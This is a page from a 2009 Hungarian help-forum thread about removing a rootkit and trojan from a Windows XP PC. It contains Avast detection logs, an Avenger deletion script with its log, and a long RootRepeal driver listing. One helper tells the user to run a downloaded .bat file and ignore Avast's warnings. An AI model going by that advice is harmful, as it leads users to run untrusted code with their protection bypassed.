Megválaszolatlan hozzászólások | Aktív témák Pontos idő: vas. dec. 29, 2024 14:43



A témát lezárták, nem szerkesztheted a hozzászólásaid, és nem küldhetsz új hozzászólást.  [ 2493 hozzászólás ]  Oldal Előző  1 ... 13, 14, 15, 16, 17, 18, 19 ... 50  Következő
VÍRUSOK, ROOTKIT ÉS MINDEN AMI ISSZA A VÉREMET:!: 
Szerző Üzenet
a fórum lelke
Avatar

Csatlakozott: vas. jún. 24, 2007 10:18
Hozzászólások: 6679
Tartózkodási hely: Revuca.S.k>>Szlovákia, nem tudok jól magyarul írni, ezért ilyen amit látsz,
Hozzászólás 
van idod,,, :D


szomb. jún. 20, 2009 21:38
Profil Privát üzenet küldése Honlap
arany tag

Csatlakozott: csüt. jan. 01, 2009 20:34
Hozzászólások: 294
Hozzászólás 
mivel több száz gigáról van szó a teljes vizsgálatkor ....holnap jelentkezem , ha jó igy


szomb. jún. 20, 2009 21:36
Profil Privát üzenet küldése
a fórum lelke
Avatar

Csatlakozott: vas. jún. 24, 2007 10:18
Hozzászólások: 6679
Tartózkodási hely: Revuca.S.k>>Szlovákia, nem tudok jól magyarul írni, ezért ilyen amit látsz,
Hozzászólás 
futasd le ezt a programot,ha az avast kiabal,ignorald
http://www.troublefixers.com/wp-content/uploads/Miscellaneous/GHremoval.bat
restart es utana a malware bytesel csinalj komplet skant amit talal torolni es ird le a helyzetet


szomb. jún. 20, 2009 21:01
Profil Privát üzenet küldése Honlap
arany tag

Csatlakozott: csüt. jan. 01, 2009 20:34
Hozzászólások: 294
Hozzászólás 
az svchost .exe - nek most a 0x6f8917c2 memoriaterülettel van baja

az avsttal átvizsgáltam a c:windowst most nem talállt semmit


szomb. jún. 20, 2009 20:35
Profil Privát üzenet küldése
arany tag

Csatlakozott: csüt. jan. 01, 2009 20:34
Hozzászólások: 294
Hozzászólás 
hajajaj ....nem találja

Logfile of The Avenger Version 2.0, (c) by Swandog46
http://swandog46.geekstogo.com

Platform: Windows XP

*******************

Script file opened successfully.
Script file read successfully.

Backups directory opened successfully at C:\Avenger

*******************

Beginning to process script file:

Rootkit scan active.
No rootkits found!


Error: file "C:\WINDOWS\System32\x" not found!
Deletion of file "C:\WINDOWS\System32\x" failed!
Status: 0xc0000034 (STATUS_OBJECT_NAME_NOT_FOUND)


--> the object does not exist


Error: file "C:\WINDOWS\system32\gen.exe" not found!
Deletion of file "C:\WINDOWS\system32\gen.exe" failed!
Status: 0xc0000034 (STATUS_OBJECT_NAME_NOT_FOUND)
--> the object does not exist


Completed script processing.

*******************

Finished! Terminate.


szomb. jún. 20, 2009 20:28
Profil Privát üzenet küldése
a fórum lelke
Avatar

Csatlakozott: vas. jún. 24, 2007 10:18
Hozzászólások: 6679
Tartózkodási hely: Revuca.S.k>>Szlovákia, nem tudok jól magyarul írni, ezért ilyen amit látsz,
Hozzászólás 
tolds le az AVANGER programot-futasd az ablakba masold be a textet,-klik-execute-yes-yes--a restart utan ted ide a logjat
http://swandog46.geekstogo.com/avenger.exe
Kód:
Files to delete:
C:\WINDOWS\System32\x
C:\WINDOWS\system32\gen.exe


szomb. jún. 20, 2009 19:56
Profil Privát üzenet küldése Honlap
arany tag

Csatlakozott: csüt. jan. 01, 2009 20:34
Hozzászólások: 294
Hozzászólás 
009.06.14. 11:37:27 PALI 1216 Sign of "Win32:Trojan-gen {Other}" has been found in "C:\WINDOWS\system32\gen.exe" file.
2009.06.14. 22:39:49 SYSTEM 1224 Sign of "Win32:Trojan-gen {Other}" has been found in "http://rs252gc2.rapidshare.com/files/82536018/5461425/MOVAVI_EnhanceMovie_2.2.part2.rar\MOVAVI EnhanceMovie 2.2\Crack\Loader.exe" file.
2009.06.20. 12:12:47 SYSTEM 1324 Sign of "Win32:Rootkit-gen [Rtk]" has been found in "C:\WINDOWS\System32\x" file.
2009.06.20. 15:26:42 SYSTEM 1288 Function setifaceUpdatePackages() has failed. Return code is 0x20000004, dwRes is 20000004.
2009.06.20. 19:39:49 SYSTEM 1276 Sign of "Win32:Confi [Wrm]" has been found in "C:\WINDOWS\System32\x\[UPX]" file.
2009.06.20. 20:22:40 SYSTEM 1228 Sign of "Win32:Rootkit-gen [Rtk]" has been found in "C:\WINDOWS\System32\x" file.
2009.06.20. 20:24:14 SYSTEM 1228 Sign of "Win32:Confi [Wrm]" has been found in "C:\WINDOWS\System32\x" file.
2009.06.20. 20:35:23 SYSTEM 1228 Sign of "Win32:Confi [Wrm]" has been found in "C:\WINDOWS\System32\x" file.


szomb. jún. 20, 2009 19:44
Profil Privát üzenet küldése
arany tag

Csatlakozott: csüt. jan. 01, 2009 20:34
Hozzászólások: 294
Hozzászólás 
az avast rootkitet talált meg trójait is ugyanott (már többször , tehát nem bír vele)c :windows/system32/x





ROOTREPEAL (c) AD, 2007-2009
==================================================
Scan Time: 2009/06/20 20:21
Program Version: Version 1.3.0.0
Windows Version: Windows XP SP2
==================================================

Drivers
-------------------
Name:
Image Path:
Address: 0xF737F000 Size: 98304 File Visible: No Signed: -
Status: -

Name:
Image Path:
Address: 0x00000000 Size: 0 File Visible: No Signed: -
Status: -

Name: 1394BUS.SYS
Image Path: C:\WINDOWS\system32\DRIVERS\1394BUS.SYS
Address: 0xF767C000 Size: 53248 File Visible: - Signed: -
Status: -

Name: a1d23twk.SYS
Image Path: C:\WINDOWS\System32\Drivers\a1d23twk.SYS
Address: 0xF69C9000 Size: 417792 File Visible: No Signed: -
Status: -

Name: a347bus.sys
Image Path: a347bus.sys
Address: 0xF741B000 Size: 160640 File Visible: - Signed: -
Status: -

Name: a347scsi.sys
Image Path: a347scsi.sys
Address: 0xF7B64000 Size: 5248 File Visible: - Signed: -
Status: -

Name: Aavmker4.SYS
Image Path: C:\WINDOWS\System32\Drivers\Aavmker4.SYS
Address: 0xF7954000 Size: 19072 File Visible: - Signed: -
Status: -

Name: ACPI.sys
Image Path: ACPI.sys
Address: 0xF73ED000 Size: 188032 File Visible: - Signed: -
Status: -

Name: ACPI_HAL
Image Path: \Driver\ACPI_HAL
Address: 0x804D7000 Size: 2142208 File Visible: - Signed: -
Status: -

Name: afd.sys
Image Path: C:\WINDOWS\System32\drivers\afd.sys
Address: 0xF2F79000 Size: 138496 File Visible: - Signed: -
Status: -

Name: AFS2K.SYS
Image Path: C:\WINDOWS\System32\Drivers\AFS2K.SYS
Address: 0xF776C000 Size: 54336 File Visible: - Signed: -
Status: -

Name: aljprsl2.SYS
Image Path: C:\WINDOWS\System32\Drivers\aljprsl2.SYS
Address: 0xF6F95000 Size: 425984 File Visible: - Signed: -
Status: -

Name: AmdK8.sys
Image Path: C:\WINDOWS\system32\DRIVERS\AmdK8.sys
Address: 0xF773C000 Size: 65536 File Visible: - Signed: -
Status: -

Name: AmdLLD.sys
Image Path: C:\WINDOWS\system32\DRIVERS\AmdLLD.sys
Address: 0xF6B0B000 Size: 61440 File Visible: - Signed: -
Status: -

Name: arp1394.sys
Image Path: C:\WINDOWS\system32\DRIVERS\arp1394.sys
Address: 0xF784C000 Size: 60800 File Visible: - Signed: -
Status: -

Name: ASACPI.sys
Image Path: C:\WINDOWS\system32\DRIVERS\ASACPI.sys
Address: 0xF7B70000 Size: 5152 File Visible: - Signed: -
Status: -

Name: ASAPIW2K.sys
Image Path: C:\WINDOWS\System32\Drivers\ASAPIW2K.sys
Address: 0xF79A4000 Size: 32768 File Visible: - Signed: -
Status: -

Name: AsIO.sys
Image Path: C:\WINDOWS\system32\drivers\AsIO.sys
Address: 0xF7BB6000 Size: 5184 File Visible: - Signed: -
Status: -

Name: aspi32.sys
Image Path: C:\WINDOWS\System32\drivers\aspi32.sys
Address: 0xF0309000 Size: 15968 File Visible: - Signed: -
Status: -

Name: asusgsb.sys
Image Path: C:\WINDOWS\system32\drivers\asusgsb.sys
Address: 0xF7031000 Size: 12416 File Visible: - Signed: -
Status: -

Name: aswFsBlk.sys
Image Path: C:\WINDOWS\system32\DRIVERS\aswFsBlk.sys
Address: 0xF2EBC000 Size: 32768 File Visible: - Signed: -
Status: -

Name: aswMon2.SYS
Image Path: C:\WINDOWS\System32\Drivers\aswMon2.SYS
Address: 0xF0903000 Size: 87296 File Visible: - Signed: -
Status: -

Name: aswRdr.SYS
Image Path: C:\WINDOWS\System32\Drivers\aswRdr.SYS
Address: 0xEFA7A000 Size: 15136 File Visible: - Signed: -
Status: -

Name: aswSP.SYS
Image Path: C:\WINDOWS\System32\Drivers\aswSP.SYS
Address: 0xF2E23000 Size: 135168 File Visible: - Signed: -
Status: -

Name: aswTdi.SYS
Image Path: C:\WINDOWS\System32\Drivers\aswTdi.SYS
Address: 0xF780C000 Size: 41664 File Visible: - Signed: -
Status: -

Name: ati2cqag.dll
Image Path: C:\WINDOWS\System32\ati2cqag.dll
Address: 0xBF0A5000 Size: 630784 File Visible: - Signed: -
Status: -

Name: ati2dvag.dll
Image Path: C:\WINDOWS\System32\ati2dvag.dll
Address: 0xBF051000 Size: 344064 File Visible: - Signed: -
Status: -

Name: ati2mtag.sys
Image Path: C:\WINDOWS\system32\DRIVERS\ati2mtag.sys
Address: 0xF6BD6000 Size: 3928064 File Visible: - Signed: -
Status: -

Name: AtiHdmi.sys
Image Path: C:\WINDOWS\system32\drivers\AtiHdmi.sys
Address: 0xF3710000 Size: 110592 File Visible: - Signed: -
Status: -

Name: atikvmag.dll
Image Path: C:\WINDOWS\System32\atikvmag.dll
Address: 0xBF13F000 Size: 540672 File Visible: - Signed: -
Status: -

Name: atkdisp.dll
Image Path: C:\WINDOWS\System32\atkdisp.dll
Address: 0xBF012000 Size: 245760 File Visible: - Signed: -
Status: -

Name: atkkbnt.sys
Image Path: C:\WINDOWS\system32\drivers\atkkbnt.sys
Address: 0xF7055000 Size: 11136 File Visible: - Signed: -
Status: -

Name: ATMFD.DLL
Image Path: C:\WINDOWS\System32\ATMFD.DLL
Address: 0xBFFA0000 Size: 286720 File Visible: - Signed: -
Status: -

Name: audstub.sys
Image Path: C:\WINDOWS\system32\DRIVERS\audstub.sys
Address: 0xF7D3D000 Size: 3072 File Visible: - Signed: -
Status: -

Name: Beep.SYS
Image Path: C:\WINDOWS\System32\Drivers\Beep.SYS
Address: 0xF7B9E000 Size: 4224 File Visible: - Signed: -
Status: -

Name: BOOTVID.dll
Image Path: C:\WINDOWS\system32\BOOTVID.dll
Address: 0xF7A6C000 Size: 12288 File Visible: - Signed: -
Status: -

Name: Cdfs.SYS
Image Path: C:\WINDOWS\System32\Drivers\Cdfs.SYS
Address: 0xF6886000 Size: 63744 File Visible: - Signed: -
Status: -

Name: cdrom.sys
Image Path: C:\WINDOWS\system32\DRIVERS\cdrom.sys
Address: 0xF777C000 Size: 49536 File Visible: - Signed: -
Status: -

Name: cfosspeed.sys
Image Path: C:\WINDOWS\system32\DRIVERS\cfosspeed.sys
Address: 0xF6918000 Size: 724992 File Visible: - Signed: -
Status: -

Name: CLASSPNP.SYS
Image Path: C:\WINDOWS\system32\DRIVERS\CLASSPNP.SYS
Address: 0xF76BC000 Size: 53248 File Visible: - Signed: -
Status: -

Name: cmdmon.sys
Image Path: C:\WINDOWS\System32\DRIVERS\cmdmon.sys
Address: 0xF30BF000 Size: 75520 File Visible: - Signed: -
Status: -

Name: disk.sys
Image Path: disk.sys
Address: 0xF76AC000 Size: 36352 File Visible: - Signed: -
Status: -

Name: dmio.sys
Image Path: dmio.sys
Address: 0xF7397000 Size: 153984 File Visible: - Signed: -
Status: -

Name: dmload.sys
Image Path: dmload.sys
Address: 0xF7B62000 Size: 5888 File Visible: - Signed: -
Status: -

Name: drmk.sys
Image Path: C:\WINDOWS\system32\drivers\drmk.sys
Address: 0xF783C000 Size: 61440 File Visible: - Signed: -
Status: -

Name: dump_atapi.sys
Image Path: C:\WINDOWS\System32\Drivers\dump_atapi.sys
Address: 0xF2E0B000 Size: 98304 File Visible: No Signed: -
Status: -

Name: dump_WMILIB.SYS
Image Path: C:\WINDOWS\System32\Drivers\dump_WMILIB.SYS
Address: 0xF7BC0000 Size: 8192 File Visible: No Signed: -
Status: -

Name: Dxapi.sys
Image Path: C:\WINDOWS\System32\drivers\Dxapi.sys
Address: 0xF2FCB000 Size: 12288 File Visible: - Signed: -
Status: -

Name: dxg.sys
Image Path: C:\WINDOWS\System32\drivers\dxg.sys
Address: 0xBF000000 Size: 73728 File Visible: - Signed: -
Status: -

Name: dxgthk.sys
Image Path: C:\WINDOWS\System32\drivers\dxgthk.sys
Address: 0xF7D61000 Size: 4096 File Visible: - Signed: -
Status: -

Name: ElbyCDFL.sys
Image Path: C:\WINDOWS\System32\Drivers\ElbyCDFL.sys
Address: 0xF799C000 Size: 27392 File Visible: - Signed: -
Status: -

Name: ElbyCDIO.sys
Image Path: C:\WINDOWS\System32\Drivers\ElbyCDIO.sys
Address: 0xF7A64000 Size: 18048 File Visible: - Signed: -
Status: -

Name: fetnd5bv.sys
Image Path: C:\WINDOWS\system32\DRIVERS\fetnd5bv.sys
Address: 0xF77EC000 Size: 42496 File Visible: - Signed: -
Status: -

Name: Fips.SYS
Image Path: C:\WINDOWS\System32\Drivers\Fips.SYS
Address: 0xF6836000 Size: 35072 File Visible: - Signed: -
Status: -

Name: fltMgr.sys
Image Path: fltMgr.sys
Address: 0xF7360000 Size: 124800 File Visible: - Signed: -
Status: -

Name: Fs_Rec.SYS
Image Path: C:\WINDOWS\System32\Drivers\Fs_Rec.SYS
Address: 0xF7B98000 Size: 7936 File Visible: - Signed: -
Status: -

Name: fsbts.sys
Image Path: fsbts.sys
Address: 0xF76EC000 Size: 49152 File Visible: - Signed: -
Status: -

Name: ftdisk.sys
Image Path: ftdisk.sys
Address: 0xF73BD000 Size: 125312 File Visible: - Signed: -
Status: -

Name: gagp30kx.sys
Image Path: gagp30kx.sys
Address: 0xF76DC000 Size: 46464 File Visible: - Signed: -
Status: -

Name: gearaspiwdm.sys
Image Path: C:\WINDOWS\system32\drivers\gearaspiwdm.sys
Address: 0xF79DC000 Size: 28672 File Visible: - Signed: -
Status: -

Name: hal.dll
Image Path: C:\WINDOWS\system32\hal.dll
Address: 0x806E2000 Size: 134400 File Visible: - Signed: -
Status: -

Name: HDAudBus.sys
Image Path: C:\WINDOWS\system32\DRIVERS\HDAudBus.sys
Address: 0xF6B9D000 Size: 151552 File Visible: - Signed: -
Status: -

Name: HIDCLASS.SYS
Image Path: C:\WINDOWS\system32\DRIVERS\HIDCLASS.SYS
Address: 0xF6866000 Size: 36864 File Visible: - Signed: -
Status: -

Name: HIDPARSE.SYS
Image Path: C:\WINDOWS\system32\DRIVERS\HIDPARSE.SYS
Address: 0xF7A44000 Size: 28672 File Visible: - Signed: -
Status: -

Name: hidusb.sys
Image Path: C:\WINDOWS\system32\DRIVERS\hidusb.sys
Address: 0xF3165000 Size: 9600 File Visible: - Signed: -
Status: -

Name: HTTP.sys
Image Path: C:\WINDOWS\System32\Drivers\HTTP.sys
Address: 0xEF783000 Size: 263040 File Visible: - Signed: -
Status: -

Name: i8042prt.sys
Image Path: C:\WINDOWS\system32\DRIVERS\i8042prt.sys
Address: 0xF77BC000 Size: 53120 File Visible: - Signed: -
Status: -

Name: imapi.sys
Image Path: C:\WINDOWS\system32\DRIVERS\imapi.sys
Address: 0xF774C000 Size: 41856 File Visible: - Signed: -
Status: -

Name: inspect.sys
Image Path: inspect.sys
Address: 0xF76CC000 Size: 51328 File Visible: - Signed: -
Status: -

Name: ipnat.sys
Image Path: C:\WINDOWS\system32\DRIVERS\ipnat.sys
Address: 0xF309E000 Size: 134912 File Visible: - Signed: -
Status: -

Name: ipsec.sys
Image Path: C:\WINDOWS\system32\DRIVERS\ipsec.sys
Address: 0xF312A000 Size: 74752 File Visible: - Signed: -
Status: -

Name: isapnp.sys
Image Path: isapnp.sys
Address: 0xF765C000 Size: 36096 File Visible: - Signed: -
Status: -

Name: kbdclass.sys
Image Path: C:\WINDOWS\system32\DRIVERS\kbdclass.sys
Address: 0xF7A04000 Size: 24960 File Visible: - Signed: -
Status: -

Name: KDCOM.DLL
Image Path: C:\WINDOWS\system32\KDCOM.DLL
Address: 0xF7B5C000 Size: 8192 File Visible: - Signed: -
Status: -

Name: kmixer.sys
Image Path: C:\WINDOWS\system32\drivers\kmixer.sys
Address: 0xEF6E1000 Size: 171776 File Visible: - Signed: -
Status: -

Name: ks.sys
Image Path: C:\WINDOWS\system32\DRIVERS\ks.sys
Address: 0xF6B7A000 Size: 143360 File Visible: - Signed: -
Status: -

Name: KSecDD.sys
Image Path: KSecDD.sys
Address: 0xF7314000 Size: 92032 File Visible: - Signed: -
Status: -

Name: MarvinBus.sys
Image Path: C:\WINDOWS\system32\DRIVERS\MarvinBus.sys
Address: 0xF6773000 Size: 188416 File Visible: - Signed: -
Status: -

Name: mnmdd.SYS
Image Path: C:\WINDOWS\System32\Drivers\mnmdd.SYS
Address: 0xF7BA4000 Size: 4224 File Visible: - Signed: -
Status: -

Name: mouclass.sys
Image Path: C:\WINDOWS\system32\DRIVERS\mouclass.sys
Address: 0xF7A1C000 Size: 23424 File Visible: - Signed: -
Status: -

Name: MountMgr.sys
Image Path: MountMgr.sys
Address: 0xF768C000 Size: 42240 File Visible: - Signed: -
Status: -

Name: mrxdav.sys
Image Path: C:\WINDOWS\system32\DRIVERS\mrxdav.sys
Address: 0xF0204000 Size: 181248 File Visible: - Signed: -
Status: -

Name: mrxsmb.sys
Image Path: C:\WINDOWS\system32\DRIVERS\mrxsmb.sys
Address: 0xF2E44000 Size: 455808 File Visible: - Signed: -
Status: -

Name: Msfs.SYS
Image Path: C:\WINDOWS\System32\Drivers\Msfs.SYS
Address: 0xF7944000 Size: 19072 File Visible: - Signed: -
Status: -

Name: msgpc.sys
Image Path: C:\WINDOWS\system32\DRIVERS\msgpc.sys
Address: 0xF78AC000 Size: 35072 File Visible: - Signed: -
Status: -

Name: MSPQM.sys
Image Path: C:\WINDOWS\system32\drivers\MSPQM.sys
Address: 0xF7BDA000 Size: 4992 File Visible: - Signed: -
Status: -

Name: mssmbios.sys
Image Path: C:\WINDOWS\system32\DRIVERS\mssmbios.sys
Address: 0xF701D000 Size: 15488 File Visible: - Signed: -
Status: -

Name: Mup.sys
Image Path: Mup.sys
Address: 0xF715D000 Size: 107904 File Visible: - Signed: -
Status: -

Name: NDIS.SYS
Image Path: C:\WINDOWS\System32\DRIVERS\NDIS.SYS
Address: 0xF725A000 Size: 182912 File Visible: - Signed: -
Status: -

Name: ndistapi.sys
Image Path: C:\WINDOWS\system32\DRIVERS\ndistapi.sys
Address: 0xF6B6A000 Size: 9600 File Visible: - Signed: -
Status: -

Name: ndisuio.sys
Image Path: C:\WINDOWS\system32\DRIVERS\ndisuio.sys
Address: 0xF09C9000 Size: 12928 File Visible: - Signed: -
Status: -

Name: ndiswan.sys
Image Path: C:\WINDOWS\system32\DRIVERS\ndiswan.sys
Address: 0xF68B7000 Size: 91776 File Visible: - Signed: -
Status: -

Name: NDProxy.SYS
Image Path: C:\WINDOWS\System32\Drivers\NDProxy.SYS
Address: 0xF6AEB000 Size: 38016 File Visible: - Signed: -
Status: -

Name: netbios.sys
Image Path: C:\WINDOWS\system32\DRIVERS\netbios.sys
Address: 0xF789C000 Size: 34560 File Visible: - Signed: -
Status: -

Name: netbt.sys
Image Path: C:\WINDOWS\system32\DRIVERS\netbt.sys
Address: 0xF2F9B000 Size: 162816 File Visible: - Signed: -
Status: -

Name: nic1394.sys
Image Path: C:\WINDOWS\system32\DRIVERS\nic1394.sys
Address: 0xF77FC000 Size: 61824 File Visible: - Signed: -
Status: -

Name: nltdi.sys
Image Path: C:\WINDOWS\system32\drivers\nltdi.sys
Address: 0xF2FEB000 Size: 77312 File Visible: - Signed: -
Status: -

Name: Npfs.SYS
Image Path: C:\WINDOWS\System32\Drivers\Npfs.SYS
Address: 0xF795C000 Size: 30848 File Visible: - Signed: -
Status: -

Name: Ntfs.sys
Image Path: Ntfs.sys
Address: 0xF7287000 Size: 574592 File Visible: - Signed: -
Status: -

Name: ntkrnlpa.exe
Image Path: C:\WINDOWS\system32\ntkrnlpa.exe
Address: 0x804D7000 Size: 2142208 File Visible: - Signed: -
Status: -

Name: Null.SYS
Image Path: C:\WINDOWS\System32\Drivers\Null.SYS
Address: 0xF7C86000 Size: 2944 File Visible: - Signed: -
Status: -

Name: ohci1394.sys
Image Path: ohci1394.sys
Address: 0xF766C000 Size: 61056 File Visible: - Signed: -
Status: -

Name: parport.sys
Image Path: C:\WINDOWS\system32\DRIVERS\parport.sys
Address: 0xF6B1B000 Size: 80128 File Visible: - Signed: -
Status: -

Name: PartMgr.sys
Image Path: PartMgr.sys
Address: 0xF78E4000 Size: 18688 File Visible: - Signed: -
Status: -

Name: ParVdm.SYS
Image Path: C:\WINDOWS\System32\Drivers\ParVdm.SYS
Address: 0xF7BB2000 Size: 6912 File Visible: - Signed: -
Status: -

Name: pci.sys
Image Path: pci.sys
Address: 0xF73DC000 Size: 67968 File Visible: - Signed: -
Status: -

Name: PCI_PNP1532
Image Path: \Driver\PCI_PNP1532
Address: 0x00000000 Size: 0 File Visible: No Signed: -
Status: -

Name: pciide.sys
Image Path: pciide.sys
Address: 0xF7C24000 Size: 3328 File Visible: - Signed: -
Status: -

Name: PCIIDEX.SYS
Image Path: C:\WINDOWS\system32\DRIVERS\PCIIDEX.SYS
Address: 0xF78DC000 Size: 28672 File Visible: - Signed: -
Status: -

Name: pclepci.sys
Image Path: C:\WINDOWS\system32\drivers\pclepci.sys
Address: 0xF3171000 Size: 14112 File Visible: - Signed: -
Status: -

Name: pcouffin.sys
Image Path: C:\WINDOWS\System32\Drivers\pcouffin.sys
Address: 0xF78CC000 Size: 47360 File Visible: - Signed: -
Status: -

Name: PCTCore.sys
Image Path: PCTCore.sys
Address: 0xF732B000 Size: 143360 File Visible: - Signed: -
Status: -

Name: PnpManager
Image Path: \Driver\PnpManager
Address: 0x804D7000 Size: 2142208 File Visible: - Signed: -
Status: -

Name: portcls.sys
Image Path: C:\WINDOWS\system32\drivers\portcls.sys
Address: 0xF68F6000 Size: 139264 File Visible: - Signed: -
Status: -

Name: PQNTDrv.SYS
Image Path: C:\WINDOWS\System32\Drivers\PQNTDrv.SYS
Address: 0xF7CC5000 Size: 2688 File Visible: - Signed: -
Status: -

Name: psched.sys
Image Path: C:\WINDOWS\system32\DRIVERS\psched.sys
Address: 0xF68A6000 Size: 69120 File Visible: - Signed: -
Status: -

Name: ptilink.sys
Image Path: C:\WINDOWS\system32\DRIVERS\ptilink.sys
Address: 0xF7994000 Size: 17792 File Visible: - Signed: -
Status: -

Name: rasacd.sys
Image Path: C:\WINDOWS\system32\DRIVERS\rasacd.sys
Address: 0xF323E000 Size: 8832 File Visible: - Signed: -
Status: -

Name: rasl2tp.sys
Image Path: C:\WINDOWS\system32\DRIVERS\rasl2tp.sys
Address: 0xF785C000 Size: 51328 File Visible: - Signed: -
Status: -

Name: raspppoe.sys
Image Path: C:\WINDOWS\system32\DRIVERS\raspppoe.sys
Address: 0xF787C000 Size: 41472 File Visible: - Signed: -
Status: -

Name: raspptp.sys
Image Path: C:\WINDOWS\system32\DRIVERS\raspptp.sys
Address: 0xF788C000 Size: 48384 File Visible: - Signed: -
Status: -

Name: raspti.sys
Image Path: C:\WINDOWS\system32\DRIVERS\raspti.sys
Address: 0xF79C4000 Size: 16512 File Visible: - Signed: -
Status: -

Name: RAW
Image Path: \FileSystem\RAW
Address: 0x804D7000 Size: 2142208 File Visible: - Signed: -
Status: -

Name: rdbss.sys
Image Path: C:\WINDOWS\system32\DRIVERS\rdbss.sys
Address: 0xF2F2C000 Size: 176512 File Visible: - Signed: -
Status: -

Name: RDPCDD.sys
Image Path: C:\WINDOWS\System32\DRIVERS\RDPCDD.sys
Address: 0xF7BAA000 Size: 4224 File Visible: - Signed: -
Status: -

Name: rdpdr.sys
Image Path: C:\WINDOWS\system32\DRIVERS\rdpdr.sys
Address: 0xF67D5000 Size: 196864 File Visible: - Signed: -
Status: -

Name: redbook.sys
Image Path: C:\WINDOWS\system32\DRIVERS\redbook.sys
Address: 0xF779C000 Size: 57728 File Visible: - Signed: -
Status: -

Name: rootrepeal.sys
Image Path: C:\WINDOWS\system32\drivers\rootrepeal.sys
Address: 0xEFAF8000 Size: 49152 File Visible: No Signed: -
Status: -

Name: RtkHDAud.sys
Image Path: C:\WINDOWS\system32\drivers\RtkHDAud.sys
Address: 0xF32A6000 Size: 4628480 File Visible: - Signed: -
Status: -

Name: SASDIFSV.SYS
Image Path: C:\Program Files\SUPERAntiSpyware\SASDIFSV.SYS
Address: 0xF7A3C000 Size: 28672 File Visible: - Signed: -
Status: -

Name: SASKUTIL.sys
Image Path: C:\Program Files\SUPERAntiSpyware\SASKUTIL.sys
Address: 0xF2F58000 Size: 135168 File Visible: - Signed: -
Status: -

Name: SCSIPORT.SYS
Image Path: C:\WINDOWS\System32\Drivers\SCSIPORT.SYS
Address: 0xF7443000 Size: 98304 File Visible: - Signed: -
Status: -

Name: serenum.sys
Image Path: C:\WINDOWS\system32\DRIVERS\serenum.sys
Address: 0xF7011000 Size: 15488 File Visible: - Signed: -
Status: -

Name: serial.sys
Image Path: C:\WINDOWS\system32\DRIVERS\serial.sys
Address: 0xF77DC000 Size: 65536 File Visible: - Signed: -
Status: -

Name: snapman.sys
Image Path: snapman.sys
Address: 0xF7178000 Size: 122560 File Visible: - Signed: -
Status: -

Name: spbp.sys
Image Path: spbp.sys
Address: 0xF745B000 Size: 1048576 File Visible: No Signed: -
Status: -

Name: sptd
Image Path: \Driver\sptd
Address: 0x00000000 Size: 0 File Visible: No Signed: -
Status: -

Name: sr.sys
Image Path: sr.sys
Address: 0xF734E000 Size: 73472 File Visible: - Signed: -
Status: -

Name: srv.sys
Image Path: C:\WINDOWS\system32\DRIVERS\srv.sys
Address: 0xEFEF0000 Size: 336256 File Visible: - Signed: -
Status: -

Name: STREAM.SYS
Image Path: C:\WINDOWS\system32\DRIVERS\STREAM.SYS
Address: 0xF781C000 Size: 49152 File Visible: - Signed: -
Status: -

Name: swenum.sys
Image Path: C:\WINDOWS\system32\DRIVERS\swenum.sys
Address: 0xF7B80000 Size: 4352 File Visible: - Signed: -
Status: -

Name: sysaudio.sys
Image Path: C:\WINDOWS\system32\drivers\sysaudio.sys
Address: 0xF6806000 Size: 60800 File Visible: - Signed: -
Status: -

Name: tbhsd.sys
Image Path: C:\WINDOWS\system32\drivers\tbhsd.sys
Address: 0xF782C000 Size: 36864 File Visible: - Signed: -
Status: -

Name: tcpip.sys
Image Path: C:\WINDOWS\system32\DRIVERS\tcpip.sys
Address: 0xF30D2000 Size: 359040 File Visible: - Signed: -
Status: -

Name: TDI.SYS
Image Path: C:\WINDOWS\system32\DRIVERS\TDI.SYS
Address: 0xF797C000 Size: 20480 File Visible: - Signed: -
Status: -

Name: tdrpman.sys
Image Path: tdrpman.sys
Address: 0xF7196000 Size: 362048 File Visible: - Signed: -
Status: -

Name: termdd.sys
Image Path: C:\WINDOWS\system32\DRIVERS\termdd.sys
Address: 0xF775C000 Size: 40704 File Visible: - Signed: -
Status: -

Name: thdudf.sys
Image Path: C:\WINDOWS\system32\DRIVERS\thdudf.sys
Address: 0xF0AA9000 Size: 66944 File Visible: - Signed: -
Status: -

Name: tifsfilt.sys
Image Path: C:\WINDOWS\system32\DRIVERS\tifsfilt.sys
Address: 0xF78BC000 Size: 37696 File Visible: - Signed: -
Status: -

Name: timntr.sys
Image Path: timntr.sys
Address: 0xF71EF000 Size: 435072 File Visible: - Signed: -
Status: -

Name: tvcap.sys
Image Path: C:\WINDOWS\system32\DRIVERS\tvcap.sys
Address: 0xF6A2F000 Size: 308736 File Visible: - Signed: -
Status: -

Name: tvtuner.sys
Image Path: C:\WINDOWS\system32\DRIVERS\tvtuner.sys
Address: 0xF7A2C000 Size: 16512 File Visible: - Signed: -
Status: -

Name: Udfs.SYS
Image Path: C:\WINDOWS\System32\Drivers\Udfs.SYS
Address: 0xF31FD000 Size: 66176 File Visible: - Signed: -
Status: -

Name: ULCDRHlp.sys
Image Path: C:\WINDOWS\System32\Drivers\ULCDRHlp.sys
Address: 0xF79B4000 Size: 27392 File Visible: - Signed: -
Status: -

Name: update.sys
Image Path: C:\WINDOWS\system32\DRIVERS\update.sys
Address: 0xF67A1000 Size: 209408 File Visible: - Signed: -
Status: -

Name: usbccgp.sys
Image Path: C:\WINDOWS\system32\DRIVERS\usbccgp.sys
Address: 0xF7974000 Size: 31616 File Visible: - Signed: -
Status: -

Name: USBD.SYS
Image Path: C:\WINDOWS\system32\DRIVERS\USBD.SYS
Address: 0xF7B92000 Size: 8192 File Visible: - Signed: -
Status: -

Name: usbehci.sys
Image Path: C:\WINDOWS\system32\DRIVERS\usbehci.sys
Address: 0xF79EC000 Size: 26624 File Visible: - Signed: -
Status: -

Name: usbhub.sys
Image Path: C:\WINDOWS\system32\DRIVERS\usbhub.sys
Address: 0xF6AAB000 Size: 57600 File Visible: - Signed: -
Status: -

Name: USBPORT.SYS
Image Path: C:\WINDOWS\system32\DRIVERS\USBPORT.SYS
Address: 0xF6B2F000 Size: 143360 File Visible: - Signed: -
Status: -

Name: usbprint.sys
Image Path: C:\WINDOWS\system32\DRIVERS\usbprint.sys
Address: 0xF798C000 Size: 25856 File Visible: - Signed: -
Status: -

Name: usbscan.sys
Image Path: C:\WINDOWS\system32\DRIVERS\usbscan.sys
Address: 0xF2FE7000 Size: 15104 File Visible: - Signed: -
Status: -

Name: usbuhci.sys
Image Path: C:\WINDOWS\system32\DRIVERS\usbuhci.sys
Address: 0xF79E4000 Size: 20480 File Visible: - Signed: -
Status: -

Name: USIUDF.sys
Image Path: C:\WINDOWS\System32\Drivers\USIUDF.sys
Address: 0xF31B5000 Size: 292896 File Visible: - Signed: -
Status: -

